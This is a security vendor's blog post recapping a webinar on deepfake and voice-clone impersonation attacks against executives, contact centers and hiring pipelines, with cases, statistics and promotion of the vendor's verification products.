AI-powered impersonation attacks use synthetic voice, deepfake video, and automation to convincingly mimic a real person, often an executive, a customer, or a job candidate in real time to move money, steal credentials, or gain insider access.
AI-Powered Impersonation Attacks: Where They’re Succeeding and How to Defend Against Them
Adriana Gil Miner
CMO • June 17, 2026 (UPDATED ON June 17, 2026)
11 minutes read time
Key takeaways
- AI-driven attacks grew nearly 14x in six quarters (Q4 2024–Q1 2026, 700M+ calls)
- AI-enabled attacks are growing ~6x faster than traditional attacks
- Humans correctly identify AI-generated media only ~50% of the time; the human eye can no longer reliably make the call.
- Pindrop’s CISO Deepfake Defense Council mapped six recurring AI attacks; three are broken down here with real cases.
- The defense is continuous identity verification across voice, video, and digital: is this a machine, a bad actor, or the right human?
Not long ago, catching a deepfake job candidate was almost easy: ask them to wave a hand in front of their face, and the image would break. That trick is now gone.
When I sat down with the panel on our latest webinar, Pindrop’s Chief People Officer, Christine Aldrich, told us today’s fake candidates have polished resumes, credible LinkedIn profiles, and clean video and audio. The human eye can’t make the call anymore. That single shift is the thread running through everything our panel covered.
As one of our board advisors puts it, there are two kinds of companies right now: the ones that have been attacked, and the ones that have been attacked and don’t know it yet.
I pulled together this panel to walk through what these attacks look like in the wild, with the people who’ve caught them:
- Michael Barnhart, a 22-year intelligence veteran now at DTEX
- Amanda Landreth, VP, AI Strategist at Spokane Teachers Credit Union (STCU)
- Christine Aldrich, Pindrop’s Chief People Officer
What are the most common AI impersonation attacks on enterprises?
Pindrop’s CISO Deepfake Defense Council, security leaders from seven Fortune 500 enterprises and other category-leading organizations, mapped six recurring AI attacks across five anonymous risk-mapping exercises.
| AI attack | What it is | Where the risk concentrates |
|---|---|---|
| 1. Fake job candidates | Synthetic identities and real-time deepfakes used to pass interviews and land on payroll | Approaching catastrophic; any org hiring remote roles |
| 2. Contact center attacks | Impersonate a customer, pass authentication, take over the account | High risk for financial services |
| 3. Executive impersonation | Cloned voice or deepfake video of a leader used to force action | Severe in defense and IP-sensitive settings |
| 4. IT help desk attacks | Impersonate an employee to obtain an MFA reset or access | Severe because the help desk is an access-control path |
| 6. Wealth management scams | Fake advisor or client personas used to redirect funds | High financial risk, wealth, brokerage, crypto, VIP workflows |
| 6. Vendor / partner impersonation | Fake supplier emails, cloned voice messages, fake invoices | Strongest in fintech, crypto, and supply-chain contexts |
In Pindrop’s own data, AI-enabled fraud is growing approximately 6x faster than traditional fraud attacks. We broke down three of the six attacks live in our webinar.
If you’re interested in learning about all six attacks in depth, read our newest report: The six high-cost AI attacks every CISO needs to know.
Read the report
How does executive impersonation actually work?
Short answer: Attackers clone a leader’s voice or face and use the authority of that identity to push an employee into a harmful action, usually a wire transfer or running a command.
Michael Barnhart shared a case that shows the pattern:
- A threat actor took over the real Telegram account of a crypto-company CEO, not a spoof.
- The target got a friendly message with a Calendly link to a video call.
- On the call, the entire leadership team, including the CEO, were deepfaked.
- “Hey, I can’t hear you. I can’t see you. Run this quick command to fix it.”
- The target pressed Windows+R, pasted the script, and the malware took over from there.
The deepfakes weren’t the goal; they were the setup to get the target comfortable enough to run a command. As Barnhart put it: “You can’t trust the audio, the visual. You have to be more proactive in looking for these things.”
According to the ESET Threat Report H1 2025, “ClickFix,” a social-engineering technique that tricks a target into running a malicious command themselves, usually behind a fake error or “fix this” prompt, rose 517% between H2 2024 and H1 2025.
How do you catch a deepfake when the voice is real?
Short answer: Authentication alone can’t, you also need liveness detection.
Authentication asks, “Is this the right voice?”; liveness detection asks, “Is this a live human or a machine?” A genuine or cloned voice can pass the first and still fail the second.
A fraudster had spent roughly 3 hours on the phone with an STCU member, posing as the credit union’s own fraud department. Then that fraudster called into the contact center, impersonating the member.
The member’s real voice passed authentication, but the agent got a low-liveness-score alert. That mismatch was the signal, and the fraud team confirmed it wasn’t the member.
The authentication answered, “Is this the right voice?” and liveness detection answered, “Is this a live human or a machine?” Both layers had to fire.
Amanda said her agents “were blown away,” because they hadn’t seen this kind of catch before.
There was an operational win too. STCU’s old knowledge-based authentication took about 90 seconds per call before a member could even ask a question. For enrolled members now, identification takes under 15 seconds.
That gap is exactly where attackers operate: across Pindrop’s analysis, attackers bypass knowledge-based authentication in up to 90% of attempts and pass one-time-password checks nearly 1 in 4 times. A matching voice alone can’t clear a caller.
How do fake job candidates get through hiring?
Short answer: They don’t look fake anymore, so the human eye fails, continuous background identity verification catches what an interviewer can’t.
Today’s fake candidates show up with polished resumes, credible LinkedIn profiles, articulate answers, and clean video and audio; all that’s left is a faint pattern of tells, like a voice slightly out of sync or a subtle video glitch.
In Pindrop’s own pipeline, continuous identity verification flagged AI activity during an interview; the team traced the IP, and it came back to North Korea.
This isn’t a one-off. In Pindrop’s hiring telemetry, 1 in 343 applicants were linked to North Korea in 2025, rising to 1 in 47 in 2026, a 630% year-over-year increase.
Christine Aldrich’s advice for HR and recruiting leaders:
- Separate identity verification from the interview itself.
- Run it continuously through every stage of hiring, not as a one-time checkpoint.
- Audit how candidates apply, not just who applies.
“If you only verify once, you’ve already lost. Fraud doesn’t stop at the first screen.”
Christine Aldrich, Pindrop’s Chief People Officer
She also pushed back on async, verify-after-the-fact tools. By the time someone’s an employee, the front door is already open. And background verification actually speeds hiring up, because what really slows it down is doubt.
When recruiters trust who they’re talking to, they can focus on the work: assessing skills and making great hires.
What do these three attacks have in common?
An executive on a video call, a member in the contact center, a candidate in an interview, three channels, but I kept coming back to the same set of questions: Is this a machine? Is this a bad actor? Is this the right human?
A one-time check can’t answer them; continuous identity verification can.
That’s the layer Pindrop® solutions were built for: authentication for the right human, liveness detection for the machine, and risk intelligence for the bad actor.
- Is this a machine? → Pindrop® Pulse for Meetings & Pindrop® Pulse for Contact Centers
- Is this a bad actor? → Pindrop® Protect
- Is this the right human? → Pindrop® Passport
Catch up on the full conversation on-demand.
Speak with an expert to catch the AI attacks your current stack is missing.
Talk to a Real Human
AI-powered impersonation attacks FAQs
Six attacks kept coming up with Pindrop’s CISO Deepfake Defense Council: fake job applicants, contact center attacks, executive impersonation, IT help desk attacks, wealth management scams, and vendor or partner impersonation. AI-enabled attacks of this kind are growing approximately 6 times faster than traditional attacks across Pindrop’s customer base.
An attacker can present a genuine recording or a synthetic version of a legitimate voice that passes voice authentication, because authentication confirms whether the voice matches, not whether it is live. Liveness detection closes that gap by identifying whether the speaker is a live human or a machine. In one case shared on the webinar, a credit union caught a fraudster whose voice passed authentication but triggered a low liveness score.
Liveness detection is technology that identifies whether a speaker is a live human and not a machine, such as a recording or a synthetic voice. It runs alongside authentication so that a real or cloned voice alone is not enough to clear a check.
Today’s fake candidates have polished resumes, credible LinkedIn profiles, and high-quality video, so the human eye is no longer reliable. Separate identity verification from the interview, run it continuously through every stage of hiring rather than as a one-time checkpoint, and audit how candidates apply, not just who applies. Continuous identity verification can flag AI activity during a live interview, as it did in Pindrop’s own pipeline.
Yes. The endgame for nation-state operatives includes funding the regime and stealing intellectual property or personal data, which means mid-size organizations and credit unions are viable targets, not just large enterprises. In a coordinated action in June 2025, the U.S. Department of Justice announced it completed “searches of 29 known or suspected ‘laptop farms’ across 16 states, and the seizure of 29 financial accounts used to launder illicit funds and 21 fraudulent websites.”
Executive impersonation is a social engineering attack in which a fraudster impersonates a senior leader, often using a cloned or synthetic voice or a deepfake on video, to manipulate employees into transferring funds, sharing credentials, or taking other harmful actions.
Related research + insights
Access expert research, detailed guides, and practical resources on voice security to strengthen your contact center’s defenses.
Article
AI-Powered Impersonation Attacks: Where They’re Succeeding and How to Defend Against Them
June 17, 202611 minutes read time
